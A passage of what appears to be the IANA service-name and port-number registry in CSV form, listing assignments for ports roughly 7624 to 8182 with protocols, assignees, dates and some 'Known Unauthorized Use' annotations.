Interface,[Elwood_Downey],[Elwood_Downey],2002-04,,,,, indi,7624,udp,Instrument Neutral Distributed Interface,[Elwood_Downey],[Elwood_Downey],2002-04,,,,, ,7625,,Unassigned,,,,,,,, simco,7626,tcp,SImple Middlebox COnfiguration (SIMCO) Server,,,,,[RFC4540],,, ,7626,udp,De-registered,,,2006-01-30,,,,, simco,7626,sctp,SImple Middlebox COnfiguration (SIMCO),[Sebastian_Kiesel],[Sebastian_Kiesel],2006-01,,,,, soap-http,7627,tcp,SOAP Service Port,[Donald_Dylla],[Donald_Dylla],2004-12,,,,, soap-http,7627,udp,SOAP Service Port,[Donald_Dylla],[Donald_Dylla],2004-12,,,,, zen-pawn,7628,tcp,Primary Agent Work Notification,[Ty_Ellis],[Ty_Ellis],2006-05,,,,, zen-pawn,7628,udp,Primary Agent Work Notification,[Ty_Ellis],[Ty_Ellis],2006-05,,,,, xdas,7629,tcp,OpenXDAS Wire Protocol,[John_Calcote_2],[John_Calcote_2],2006-10,,,,, xdas,7629,udp,OpenXDAS Wire Protocol,[John_Calcote_2],[John_Calcote_2],2006-10,,,,, hawk,7630,tcp,HA Web Konsole,[Tim_Serong],[Tim_Serong],2010-03-31,,,,, ,7630,udp,Reserved,,,,,,,, tesla-sys-msg,7631,tcp,TESLA System Messaging,[Andy_Perreault],[Andy_Perreault],2010-03-31,,,,, ,7631,udp,Reserved,,,,,,,, ,7632,,Unassigned,,,,,,,, pmdfmgt,7633,tcp,PMDF Management,[Hunter_Goatley],[Hunter_Goatley],,,,,, pmdfmgt,7633,udp,PMDF Management,[Hunter_Goatley],[Hunter_Goatley],,,,,, ,7634-7647,,Unassigned,,,,,,,, cuseeme,7648,tcp,bonjour-cuseeme,[Marc_Manthey],[Marc_Manthey],2006-07,,,,, cuseeme,7648,udp,bonjour-cuseeme,[Marc_Manthey],[Marc_Manthey],2006-07,,,,, ,7649-7671,,Unassigned,,,,,,,, imqstomp,7672,tcp,iMQ STOMP Server,[Amy_Kang],[Amy_Kang],2009-03-10,,,,, ,7672,udp,Reserved,,,,,,,, imqstomps,7673,tcp,iMQ STOMP Server over SSL,[Amy_Kang],[Amy_Kang],2009-03-10,,,,, ,7673,udp,Reserved,,,,,,,, imqtunnels,7674,tcp,iMQ SSL tunnel,[Shailesh_S_Bavadeka],[Shailesh_S_Bavadeka],2002-04,,,,, imqtunnels,7674,udp,iMQ SSL tunnel,[Shailesh_S_Bavadeka],[Shailesh_S_Bavadeka],2002-04,,,,, imqtunnel,7675,tcp,iMQ Tunnel,[Shailesh_S_Bavadeka],[Shailesh_S_Bavadeka],2002-04,,,,, imqtunnel,7675,udp,iMQ Tunnel,[Shailesh_S_Bavadeka],[Shailesh_S_Bavadeka],2002-04,,,,, imqbrokerd,7676,tcp,iMQ Broker Rendezvous,[Joseph_Di_Pol],[Joseph_Di_Pol],2002-04,,,,, imqbrokerd,7676,udp,iMQ Broker Rendezvous,[Joseph_Di_Pol],[Joseph_Di_Pol],2002-04,,,,, sun-user-https,7677,tcp,Sun App Server - HTTPS,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, sun-user-https,7677,udp,Sun App Server - HTTPS,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, ,7678-7679,,Unassigned,,,,,,,, pando-pub,7680,tcp,Pando Media Public Distribution,[Laird_Popkin],[Laird_Popkin],2008-02-27,,,,, pando-pub,7680,udp,Pando Media Public Distribution,[Laird_Popkin],[Laird_Popkin],2008-02-27,,,,, ,7681-7688,,Unassigned,,,,,,,, collaber,7689,tcp,Collaber Network Service,[Rajesh_Akkineni],[Rajesh_Akkineni],2007-01,,,,, collaber,7689,udp,Collaber Network Service,[Rajesh_Akkineni],[Rajesh_Akkineni],2007-01,,,,, ,7690-7696,,Unassigned,,,,,,,, klio,7697,tcp,KLIO communications,[Helmut_Giritzer_2],[Helmut_Giritzer_2],2005-08,,,,, klio,7697,udp,KLIO communications,[Helmut_Giritzer_2],[Helmut_Giritzer_2],2005-08,,,,, ,7698-7699,,Unassigned,,,,,,,, em7-secom,7700,tcp,EM7 Secure Communications,[Christopher_Cordray],[Christopher_Cordray],2008-06-05,,,,, ,7700,udp,Reserved,,,,,,,, ,7701-7706,,Unassigned,,,,,,,, sync-em7,7707,tcp,EM7 Dynamic Updates,[Christopher_Cordray],[Christopher_Cordray],2004-11,,,,, sync-em7,7707,udp,EM7 Dynamic Updates,[Christopher_Cordray],[Christopher_Cordray],2004-11,,,,, scinet,7708,tcp,scientia.net,[Christoph_Anton_Mitt],[Christoph_Anton_Mitt],2006-01,,,,, scinet,7708,udp,scientia.net,[Christoph_Anton_Mitt],[Christoph_Anton_Mitt],2006-01,,,,, ,7709-7719,,Unassigned,,,,,,,, medimageportal,7720,tcp,MedImage Portal,[Robert_Helton],[Robert_Helton],2003-10,,,,, medimageportal,7720,udp,MedImage Portal,[Robert_Helton],[Robert_Helton],2003-10,,,,, ,7721-7723,,Unassigned,,,,,,,, nsdeepfreezectl,7724,tcp,Novell Snap-in Deep Freeze Control,[David_Crowe],[David_Crowe],2008-01-07,,,,, nsdeepfreezectl,7724,udp,Novell Snap-in Deep Freeze Control,[David_Crowe],[David_Crowe],2008-01-07,,,,, nitrogen,7725,tcp,Nitrogen Service,[Randy_Lomnes],[Randy_Lomnes],2004-11,,,,, nitrogen,7725,udp,Nitrogen Service,[Randy_Lomnes],[Randy_Lomnes],2004-11,,,,, freezexservice,7726,tcp,FreezeX Console Service,[David_Crowe],[David_Crowe],2005-06,,,,, freezexservice,7726,udp,FreezeX Console Service,[David_Crowe],[David_Crowe],2005-06,,,,, trident-data,7727,tcp,Trident Systems Data,[Jeremy_McClintock],[Jeremy_McClintock],2005-08,,,,, trident-data,7727,udp,Trident Systems Data,[Jeremy_McClintock],[Jeremy_McClintock],2005-08,,,,, ,7728-7733,,Unassigned,,,,,,,, smip,7734,tcp,Smith Protocol over IP,[Jim_Pettinato],[Jim_Pettinato],2007-04,,,,, smip,7734,udp,Smith Protocol over IP,[Jim_Pettinato],[Jim_Pettinato],2007-04,,,,, ,7735-7737,,Unassigned,,,,,,,, aiagent,7738,tcp,HP Enterprise Discovery Agent,[Matthew_Darwin],[Matthew_Darwin],2005-08,,,,, aiagent,7738,udp,HP Enterprise Discovery Agent,[Matthew_Darwin],[Matthew_Darwin],2005-08,,,,, ,7739-7740,,Unassigned,,,,,,,, scriptview,7741,tcp,ScriptView Network,[Reinhard_Wolf],[Reinhard_Wolf],2010-08-19,,,,, scriptview,7741,udp,ScriptView Network,[Reinhard_Wolf],[Reinhard_Wolf],2010-08-19,,,,, msss,7742,tcp,Mugginsoft Script Server Service,[Jonathan_Mitchell],[Jonathan_Mitchell],2008-09-08,,,,, ,7742,udp,Reserved,,,,,,,, sstp-1,7743,tcp,Sakura Script Transfer Protocol,[Kouichi_Takeda],[Kouichi_Takeda],,,,,, sstp-1,7743,udp,Sakura Script Transfer Protocol,[Kouichi_Takeda],[Kouichi_Takeda],,,,,, raqmon-pdu,7744,tcp,RAQMON PDU,,,,,[RFC4712],,, raqmon-pdu,7744,udp,RAQMON PDU,,,,,[RFC4712],,, ,7745-7746,,Unassigned,,,,,,,, prgp,7747,tcp,Put/Run/Get Protocol,[Jayasooriah],[Jayasooriah],2008-02-22,,,,, prgp,7747,udp,Put/Run/Get Protocol,[Jayasooriah],[Jayasooriah],2008-02-22,,,,, ,7748-7776,,Unassigned,,,,,,,, cbt,7777,tcp,cbt,[Tony_Ballardie],[Tony_Ballardie],,,,,Known Unauthorized Use on port 7777, cbt,7777,udp,cbt,[Tony_Ballardie],[Tony_Ballardie],,,,,Known Unauthorized Use on port 7777, interwise,7778,tcp,Interwise,[Joseph_Gray],[Joseph_Gray],,,,,, interwise,7778,udp,Interwise,[Joseph_Gray],[Joseph_Gray],,,,,, vstat,7779,tcp,VSTAT,[Vinh_Nguyn],[Vinh_Nguyn],,,,,, vstat,7779,udp,VSTAT,[Vinh_Nguyn],[Vinh_Nguyn],,,,,, ,7780,,Unassigned,,,,,,,, accu-lmgr,7781,tcp,accu-lmgr,[Moises_E_Hernandez],[Moises_E_Hernandez],,,,,, accu-lmgr,7781,udp,accu-lmgr,[Moises_E_Hernandez],[Moises_E_Hernandez],,,,,, ,7782-7785,,Unassigned,,,,,,,Known Unauthorized Use on port 7785, minivend,7786,tcp,MINIVEND,[Mike_Heins],[Mike_Heins],,,,,Known Unauthorized Use on port 7786, minivend,7786,udp,MINIVEND,[Mike_Heins],[Mike_Heins],,,,,Known Unauthorized Use on port 7786, popup-reminders,7787,tcp,Popup Reminders Receive,[Robert_Harvey],[Robert_Harvey],2006-01,,,,Known Unauthorized Use on port 7787, popup-reminders,7787,udp,Popup Reminders Receive,[Robert_Harvey],[Robert_Harvey],2006-01,,,,Known Unauthorized Use on port 7787, ,7788,,Unassigned,,,,,,,Known Unauthorized Use on port 7788, office-tools,7789,tcp,Office Tools Pro Receive,[Robert_Harvey],[Robert_Harvey],2006-01,,,,Known Unauthorized Use on port 7789, office-tools,7789,udp,Office Tools Pro Receive,[Robert_Harvey],[Robert_Harvey],2006-01,,,,Known Unauthorized Use on port 7789, ,7790-7793,,Unassigned,,,,,,,, q3ade,7794,tcp,Q3ADE Cluster Service,[Uffe_Harksen],[Uffe_Harksen],2005-08,,,,, q3ade,7794,udp,Q3ADE Cluster Service,[Uffe_Harksen],[Uffe_Harksen],2005-08,,,,, ,7795-7796,,Unassigned,,,,,,,, pnet-conn,7797,tcp,Propel Connector port,,,,,,,, pnet-conn,7797,udp,Propel Connector port,,,,,,,, pnet-enc,7798,tcp,Propel Encoder port,[Leif_Hedstrom],[Leif_Hedstrom],2002-04,,,,, pnet-enc,7798,udp,Propel Encoder port,[Leif_Hedstrom],[Leif_Hedstrom],2002-04,,,,, altbsdp,7799,tcp,Alternate BSDP Service,[Dieter_Siegmund],[Dieter_Siegmund],2007-10-22,,,,, altbsdp,7799,udp,Alternate BSDP Service,[Dieter_Siegmund],[Dieter_Siegmund],2007-10-22,,,,, asr,7800,tcp,Apple Software Restore,[Jim_Kateley][Shantonu_Sen],[Jim_Kateley][Shantonu_Sen],2006-01,,,,,Defined TXT keys: image= asr,7800,udp,Apple Software Restore,[Jim_Kateley][Shantonu_Sen],[Jim_Kateley][Shantonu_Sen],2006-01,,,,,Defined TXT keys: image= ssp-client,7801,tcp,Secure Server Protocol - client,[Rick_Macchio],[Rick_Macchio],2006-11,,,,, ssp-client,7801,udp,Secure Server Protocol - client,[Rick_Macchio],[Rick_Macchio],2006-11,,,,, vns-tp,7802,udp,Virtualized Network Services Tunnel Protocol,[Juniper_Networks],[Bruno_Rijsman],2013-02-01,,,,, ,7802,tcp,Reserved,,,,,,,, ,7803-7809,,Unassigned,,,,,,,, rbt-wanopt,7810,tcp,Riverbed WAN Optimization Protocol,[Vladimir_Legalov_2],[Vladimir_Legalov_2],2007-09-04,,,,, rbt-wanopt,7810,udp,Riverbed WAN Optimization Protocol,[Vladimir_Legalov_2],[Vladimir_Legalov_2],2007-09-04,,,,, ,7811-7844,,Unassigned,,,,,,,, apc-7845,7845,tcp,APC 7845,[American_Power_Conve],[American_Power_Conve],,,,,, apc-7845,7845,udp,APC 7845,[American_Power_Conve],[American_Power_Conve],,,,,, apc-7846,7846,tcp,APC 7846,[American_Power_Conve],[American_Power_Conve],,,,,, apc-7846,7846,udp,APC 7846,[American_Power_Conve],[American_Power_Conve],,,,,, csoauth,7847,tcp,A product key authentication protocol made by CSO,[Jeff_Wamsley],[Jacob_Kiesel],2013-09-04,,,,, ,7847,udp,Reserved,,,,,,,, ,7848-7868,,Unassigned,,,,,,,, mobileanalyzer,7869,tcp,MobileAnalyzer& MobileMonitor,[Jonas_Gyllensvaan],[Jonas_Gyllensvaan],2009-04-27,,,,, ,7869,udp,Reserved,,,,,,,, rbt-smc,7870,tcp,Riverbed Steelhead Mobile Service,[Gabriel_Levy],[Gabriel_Levy],2008-08-29,,,,, ,7870,udp,Reserved,,,,,,,, mdm,7871,tcp,Mobile Device Management,[Dan_Harkins],[Dan_Harkins],2011-08-15,,,,, ,7871,udp,Reserved,,,,,,,, ,7872,tcp,Reserved,,,,,,,, mipv6tls,7872,udp,TLS-based Mobile IPv6 Security,[IESG],[IETF_Chair],2012-04-12,,[RFC6618],,, ,7873-7877,,Unassigned,,,,,,,, owms,7878,tcp,Opswise Message Service,[Stonebranch_Inc],[Nathan_Hammond_2],2013-06-25,,,,, ,7878,udp,Reserved,,,,,,,, ,7879,,Unassigned,,,,,,,, pss,7880,tcp,Pearson,[Pearson],[Pearson],2008-01-17,,,,, pss,7880,udp,Pearson,[Pearson],[Pearson],2008-01-17,,,,, ,7881-7886,,Unassigned,,,,,,,, ubroker,7887,tcp,Universal Broker,[Nathan_Hammond],[Nathan_Hammond],2005-10,,,,, ubroker,7887,udp,Universal Broker,[Nathan_Hammond],[Nathan_Hammond],2005-10,,,,, ,7888-7899,,Unassigned,,,,,,,, mevent,7900,tcp,Multicast Event,[YoonSoo_Kim],[YoonSoo_Kim],2006-05,,,,, mevent,7900,udp,Multicast Event,[YoonSoo_Kim],[YoonSoo_Kim],2006-05,,,,, tnos-sp,7901,tcp,TNOS Service Protocol,[Rene_Kurt],[Rene_Kurt],2005-08,,,,, tnos-sp,7901,udp,TNOS Service Protocol,[Rene_Kurt],[Rene_Kurt],2005-08,,,,, tnos-dp,7902,tcp,TNOS shell Protocol,[Rene_Kurt],[Rene_Kurt],2005-08,,,,, tnos-dp,7902,udp,TNOS shell Protocol,[Rene_Kurt],[Rene_Kurt],2005-08,,,,, tnos-dps,7903,tcp,TNOS Secure DiaguardProtocol,[Rene_Kurt],[Rene_Kurt],2005-08,,,,, tnos-dps,7903,udp,TNOS Secure DiaguardProtocol,[Rene_Kurt],[Rene_Kurt],2005-08,,,,, ,7904-7912,,Unassigned,,,,,,,, qo-secure,7913,tcp,QuickObjects secure port,[Jonas_Bovin],[Jonas_Bovin],,,,,, qo-secure,7913,udp,QuickObjects secure port,[Jonas_Bovin],[Jonas_Bovin],,,,,, ,7914-7931,,Unassigned,,,,,,,, t2-drm,7932,tcp,Tier 2 Data Resource Manager,[Peter_Carlson],[Peter_Carlson],,,,,, t2-drm,7932,udp,Tier 2 Data Resource Manager,[Peter_Carlson],[Peter_Carlson],,,,,, t2-brm,7933,tcp,Tier 2 Business Rules Manager,[Peter_Carlson],[Peter_Carlson],,,,,, t2-brm,7933,udp,Tier 2 Business Rules Manager,[Peter_Carlson],[Peter_Carlson],,,,,, ,7934-7961,,Unassigned,,,,,,,, generalsync,7962,tcp,"Encrypted, extendable, general-purpose synchronization protocol",[Dirk_Steinmetz],[Dirk_Steinmetz],2014-04-17,,,,, generalsync,7962,udp,"Encrypted, extendable, general-purpose synchronization protocol",[Dirk_Steinmetz],[Dirk_Steinmetz],2014-04-17,,,,, ,7963-7966,,Unassigned,,,,,,,, supercell,7967,tcp,Supercell,[Kevin_Nakagawa],[Kevin_Nakagawa],,,,,, supercell,7967,udp,Supercell,[Kevin_Nakagawa],[Kevin_Nakagawa],,,,,, ,7968-7978,,Unassigned,,,,,,,, micromuse-ncps,7979,tcp,Micromuse-ncps,[Hing_Wing_To],[Hing_Wing_To],,,,,, micromuse-ncps,7979,udp,Micromuse-ncps,[Hing_Wing_To],[Hing_Wing_To],,,,,, quest-vista,7980,tcp,Quest Vista,[Preston_Bannister],[Preston_Bannister],,,,,, quest-vista,7980,udp,Quest Vista,[Preston_Bannister],[Preston_Bannister],,,,,, sossd-collect,7981,tcp,Spotlight on SQL Server Desktop Collect,[Rob_Griffin_2],[Rob_Griffin_2],2010-08-30,,,,, ,7981,udp,Reserved,,,,,,,, sossd-agent,7982,tcp,Spotlight on SQL Server Desktop Agent,[Rob_Griffin_2],[Rob_Griffin_2],2010-09-13,,,,, sossd-disc,7982,udp,Spotlight on SQL Server Desktop Agent Discovery,[Rob_Griffin_2],[Rob_Griffin_2],2010-09-13,,,,, ,7983-7997,,Unassigned,,,,,,,, pushns,7997,tcp,PUSH Notification Service,[Tristan_Seifert],[Tristan_Seifert],2011-01-31,,,,, ,7997,udp,Reserved,,,,,,,, ,7998,tcp,Reserved,,,,,,,, usicontentpush,7998,udp,USI Content Push Service,[Prakash_Iyer],[Prakash_Iyer],2009-08-10,,,,, irdmi2,7999,tcp,iRDMI2,,,,,,,, irdmi2,7999,udp,iRDMI2,,,,,,,, irdmi,8000,tcp,iRDMI,[Gil_Shafriri],[Gil_Shafriri],,,,,, irdmi,8000,udp,iRDMI,[Gil_Shafriri],[Gil_Shafriri],,,,,, vcom-tunnel,8001,tcp,VCOM Tunnel,[Mark_Lewandowski],[Mark_Lewandowski],,,,,Known Unauthorized Use on port 8001, vcom-tunnel,8001,udp,VCOM Tunnel,[Mark_Lewandowski],[Mark_Lewandowski],,,,,Known Unauthorized Use on port 8001, teradataordbms,8002,tcp,Teradata ORDBMS,[Curt_Ellmann],[Curt_Ellmann],,,,,, teradataordbms,8002,udp,Teradata ORDBMS,[Curt_Ellmann],[Curt_Ellmann],,,,,, mcreport,8003,tcp,Mulberry Connect Reporting Service,[Dave_Stoneham],[Dave_Stoneham],2008-03-10,,,,, mcreport,8003,udp,Mulberry Connect Reporting Service,[Dave_Stoneham],[Dave_Stoneham],2008-03-10,,,,, ,8004,,Unassigned,,,,,,,, mxi,8005,tcp,MXI Generation II for z/OS,[Rob_Scott],[Rob_Scott],2007-05,,,,, mxi,8005,udp,MXI Generation II for z/OS,[Rob_Scott],[Rob_Scott],2007-05,,,,, ,8006-8007,,Unassigned,,,,,,,, http-alt,8008,tcp,HTTP Alternate,[James_Gettys],[James_Gettys],,,,,, http-alt,8008,udp,HTTP Alternate,[James_Gettys],[James_Gettys],,,,,, ,8009-8018,,Unassigned,,,,,,,, qbdb,8019,tcp,QB DB Dynamic Port,[Sridhar_Krishnamurth],[Sridhar_Krishnamurth],2008-02-15,,,,, qbdb,8019,udp,QB DB Dynamic Port,[Sridhar_Krishnamurth],[Sridhar_Krishnamurth],2008-02-15,,,,, intu-ec-svcdisc,8020,tcp,Intuit Entitlement Service and Discovery,[Daniel_C_McGloin],[Daniel_C_McGloin],2005-05,,,,, intu-ec-svcdisc,8020,udp,Intuit Entitlement Service and Discovery,[Daniel_C_McGloin],[Daniel_C_McGloin],2005-05,,,,, intu-ec-client,8021,tcp,Intuit Entitlement Client,[Daniel_C_McGloin],[Daniel_C_McGloin],2005-05,,,,, intu-ec-client,8021,udp,Intuit Entitlement Client,[Daniel_C_McGloin],[Daniel_C_McGloin],2005-05,,,,, oa-system,8022,tcp,oa-system,[Marie_France_Dubreui],[Marie_France_Dubreui],,,,,, oa-system,8022,udp,oa-system,[Marie_France_Dubreui],[Marie_France_Dubreui],,,,,, ,8023-8024,,Unassigned,,,,,,,, ca-audit-da,8025,tcp,CA Audit Distribution Agent,[Henning_Smith],[Henning_Smith],2006-07,,,,, ca-audit-da,8025,udp,CA Audit Distribution Agent,[Henning_Smith],[Henning_Smith],2006-07,,,,, ca-audit-ds,8026,tcp,CA Audit Distribution Server,[Henning_Smith],[Henning_Smith],2006-07,,,,, ca-audit-ds,8026,udp,CA Audit Distribution Server,[Henning_Smith],[Henning_Smith],2006-07,,,,, ,8027-8031,,Unassigned,,,,,,,, pro-ed,8032,tcp,ProEd,,,,,,,, pro-ed,8032,udp,ProEd,,,,,,,, mindprint,8033,tcp,MindPrint,[Larry_Tusoni],[Larry_Tusoni],,,,,, mindprint,8033,udp,MindPrint,[Larry_Tusoni],[Larry_Tusoni],,,,,, vantronix-mgmt,8034,tcp,.vantronix Management,[Reyk_Floeter],[Reyk_Floeter],2008-02-27,,,,, vantronix-mgmt,8034,udp,.vantronix Management,[Reyk_Floeter],[Reyk_Floeter],2008-02-27,,,,, ,8035-8039,,Unassigned,,,,,,,, ampify,8040,tcp,Ampify Messaging Protocol,[Tav_Espian],[Tav_Espian],2010-08-10,,,,, ampify,8040,udp,Ampify Messaging Protocol,[Tav_Espian],[Tav_Espian],2010-08-10,,,,, ,8041,,Unassigned,,,,,,,, fs-agent,8042,tcp,FireScope Agent,[Matt_Rogers],[Matt_Rogers],2008-10-16,,,,, ,8042,udp,Reserved,,,,,,,, fs-server,8043,tcp,FireScope Server,[Matt_Rogers],[Matt_Rogers],2008-10-16,,,,, ,8043,udp,Reserved,,,,,,,, fs-mgmt,8044,tcp,FireScope Management Interface,[Matt_Rogers],[Matt_Rogers],2008-10-16,,,,, ,8044,udp,Reserved,,,,,,,, ,8045-8050,,Unassigned,,,,,,,, rocrail,8051,tcp,Rocrail Client Service,[Rob_Versluis],[Rob_Versluis],2011-05-23,,,,, ,8051,udp,Reserved,,,,,,,, senomix01,8052,tcp,Senomix Timesheets Server,[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix01,8052,udp,Senomix Timesheets Server,[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix02,8053,tcp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix02,8053,udp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix03,8054,tcp,Senomix Timesheets Server [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix03,8054,udp,Senomix Timesheets Server [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix04,8055,tcp,Senomix Timesheets Server [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix04,8055,udp,Senomix Timesheets Server [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix05,8056,tcp,Senomix Timesheets Server [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix05,8056,udp,Senomix Timesheets Server [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix06,8057,tcp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix06,8057,udp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix07,8058,tcp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix07,8058,udp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix08,8059,tcp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, senomix08,8059,udp,Senomix Timesheets Client [1 year assignment],[Charles_O_Dale],[Charles_O_Dale],2006-07,,,,, ,8060,tcp,Reserved,,,,,,,, aero,8060,udp,Asymmetric Extended Route Optimization (AERO),[IESG],[IETF_Chair],,,[RFC6706],,, ,8061-8065,,Unassigned,,,,,,,, toad-bi-appsrvr,8066,tcp,Toad BI Application Server,[Quest_Software_2],[Greg_Cottman_3],2013-04-19,,,,, ,8066,udp,Reserved,,,,,,,, ,8067-8073,,Unassigned,,,,,,,, gadugadu,8074,tcp,Gadu-Gadu,[Marcin_Gozdalik],[Marcin_Gozdalik],2006-05,,,,, gadugadu,8074,udp,Gadu-Gadu,[Marcin_Gozdalik],[Marcin_Gozdalik],2006-05,,,,, ,8075-8079,,Unassigned,,,,,,,, http-alt,8080,tcp,HTTP Alternate (see port 80),[Stephen_Casner],[Stephen_Casner],,,,,, http-alt,8080,udp,HTTP Alternate (see port 80),[Stephen_Casner],[Stephen_Casner],,,,,, sunproxyadmin,8081,tcp,Sun Proxy Admin Service,[Arvind_Srinivasan],[Arvind_Srinivasan],2005-08,,,,, sunproxyadmin,8081,udp,Sun Proxy Admin Service,[Arvind_Srinivasan],[Arvind_Srinivasan],2005-08,,,,, us-cli,8082,tcp,Utilistor (Client),[Andy_Brewerton],[Andy_Brewerton],2005-08,,,,, us-cli,8082,udp,Utilistor (Client),[Andy_Brewerton],[Andy_Brewerton],2005-08,,,,, us-srv,8083,tcp,Utilistor (Server),[Andy_Brewerton],[Andy_Brewerton],2005-08,,,,, us-srv,8083,udp,Utilistor (Server),[Andy_Brewerton],[Andy_Brewerton],2005-08,,,,, ,8084-8085,,Unassigned,,,,,,,, d-s-n,8086,tcp,Distributed SCADA Networking Rendezvous Port,[Gary_Hampton],[Gary_Hampton],2008-02-27,,,,, d-s-n,8086,udp,Distributed SCADA Networking Rendezvous Port,[Gary_Hampton],[Gary_Hampton],2008-02-27,,,,, simplifymedia,8087,tcp,Simplify Media SPP Protocol,[Emmanuel_Saint_Loube],[Emmanuel_Saint_Loube],2008-08-08,,,,, simplifymedia,8087,udp,Simplify Media SPP Protocol,[Emmanuel_Saint_Loube],[Emmanuel_Saint_Loube],2008-08-08,,,,, radan-http,8088,tcp,Radan HTTP,[Steve_Hay],[Steve_Hay],2008-06-13,,,,, radan-http,8088,udp,Radan HTTP,[Steve_Hay],[Steve_Hay],2008-06-13,,,,, ,8089-8090,,Unassigned,,,,,,,, jamlink,8091,tcp,Jam Link Framework,[Evgeniy_Filatov],[Evgeniy_Filatov],2009-11-25,,,,, ,8091,udp,Reserved,,,,,,,, ,8092-8096,,Unassigned,,,,,,,, sac,8097,tcp,SAC Port Id,[Girish_Bhat],[Girish_Bhat],2006-04,,,,, sac,8097,udp,SAC Port Id,[Girish_Bhat],[Girish_Bhat],2006-04,,,,, ,8098-8099,,Unassigned,,,,,,,, xprint-server,8100,tcp,Xprint Server,[John_McKernan],[John_McKernan],,,,,, xprint-server,8100,udp,Xprint Server,[John_McKernan],[John_McKernan],,,,,, ldoms-migr,8101,tcp,Logical Domains Migration,[Liam_Merwick],[Liam_Merwick],2009-01-16,,,,, ,8101,udp,Reserved,,,,,,,, kz-migr,8102,tcp,Oracle Kernel zones migration server,[Oracle_4],[John_Levon],2013-12-24,,,,, ,8102,udp,Reserved,,,,,,,, ,8103-8114,,Unassigned,,,,,,,, mtl8000-matrix,8115,tcp,MTL8000 Matrix,[David_Pinch],[David_Pinch],2002-04,,,,, mtl8000-matrix,8115,udp,MTL8000 Matrix,[David_Pinch],[David_Pinch],2002-04,,,,, cp-cluster,8116,tcp,Check Point Clustering,[Roni_Moshitzky],[Roni_Moshitzky],,,,,, cp-cluster,8116,udp,Check Point Clustering,[Roni_Moshitzky],[Roni_Moshitzky],,,,,, purityrpc,8117,tcp,Purity replication clustering and remote management,[Pure_Storage],[Steve_Hodgson],2013-08-13,,,,, ,8117,udp,Reserved,,,,,,,, privoxy,8118,tcp,Privoxy HTTP proxy,[Andreas_Oesterhelt],[Andreas_Oesterhelt],2002-06,,,,, privoxy,8118,udp,Privoxy HTTP proxy,[Andreas_Oesterhelt],[Andreas_Oesterhelt],2002-06,,,,, ,8119-8120,,Unassigned,,,,,,,, apollo-data,8121,tcp,Apollo Data Port,[Anthony_Carrabino],[Anthony_Carrabino],2003-08,,,,, apollo-data,8121,udp,Apollo Data Port,[Anthony_Carrabino],[Anthony_Carrabino],2003-08,,,,, apollo-admin,8122,tcp,Apollo Admin Port,[Anthony_Carrabino],[Anthony_Carrabino],2003-08,,,,, apollo-admin,8122,udp,Apollo Admin Port,[Anthony_Carrabino],[Anthony_Carrabino],2003-08,,,,, ,8123-8127,,Unassigned,,,,,,,, paycash-online,8128,tcp,PayCash Online Protocol,[MegaZone],[MegaZone],2005-08,,,,, paycash-online,8128,udp,PayCash Online Protocol,[MegaZone],[MegaZone],2005-08,,,,, paycash-wbp,8129,tcp,PayCash Wallet-Browser,[MegaZone],[MegaZone],2005-08,,,,, paycash-wbp,8129,udp,PayCash Wallet-Browser,[MegaZone],[MegaZone],2005-08,,,,, indigo-vrmi,8130,tcp,INDIGO-VRMI,[Colin_Caughie],[Colin_Caughie],,,,,, indigo-vrmi,8130,udp,INDIGO-VRMI,[Colin_Caughie],[Colin_Caughie],,,,,, indigo-vbcp,8131,tcp,INDIGO-VBCP,[Colin_Caughie],[Colin_Caughie],,,,,, indigo-vbcp,8131,udp,INDIGO-VBCP,[Colin_Caughie],[Colin_Caughie],,,,,, dbabble,8132,tcp,dbabble,[Chris_Pugmire],[Chris_Pugmire],,,,,, dbabble,8132,udp,dbabble,[Chris_Pugmire],[Chris_Pugmire],,,,,, ,8133-8147,,Unassigned,,,,,,,, isdd,8148,tcp,i-SDD file transfer,[Frank_Waarsenburg],[Frank_Waarsenburg],2004-11,,,,, isdd,8148,udp,i-SDD file transfer,[Frank_Waarsenburg],[Frank_Waarsenburg],2004-11,,,,, ,8149,tcp,Reserved,,,,,,,, eor-game,8149,udp,Edge of Reality game data,[Sky_Schulz],[Sky_Schulz],2011-05-09,,,,, ,8150-8152,,Unassigned,,,,,,,, quantastor,8153,tcp,QuantaStor Management Interface,[OS_NEXUS],[Steven_Umbehocker],2012-09-21,,,,, ,8153,udp,Reserved,,,,,,,, ,8154-8159,,Unassigned,,,,,,,, patrol,8160,tcp,Patrol,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, patrol,8160,udp,Patrol,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, patrol-snmp,8161,tcp,Patrol SNMP,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, patrol-snmp,8161,udp,Patrol SNMP,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, lpar2rrd,8162,tcp,LPAR2RRD client server communication,[LPAR2RRD_project],[Pavel_Hampl],2013-08-14,,,,, ,8162,udp,Reserved,,,,,,,, ,8163-8180,,Unassigned,,,,,,,, intermapper,8181,tcp,Intermapper network management system,[William_Fisher],[William_Fisher],2011-05-09,,,,, ,8181,udp,Reserved,,,,,,,, vmware-fdm,8182,tcp,VMware Fault Domain Manager,[Ron_Passerini],[Ron_Passerini],2010-04-27,,,,, vmware-fdm,8182,udp,VMware Fault Domain 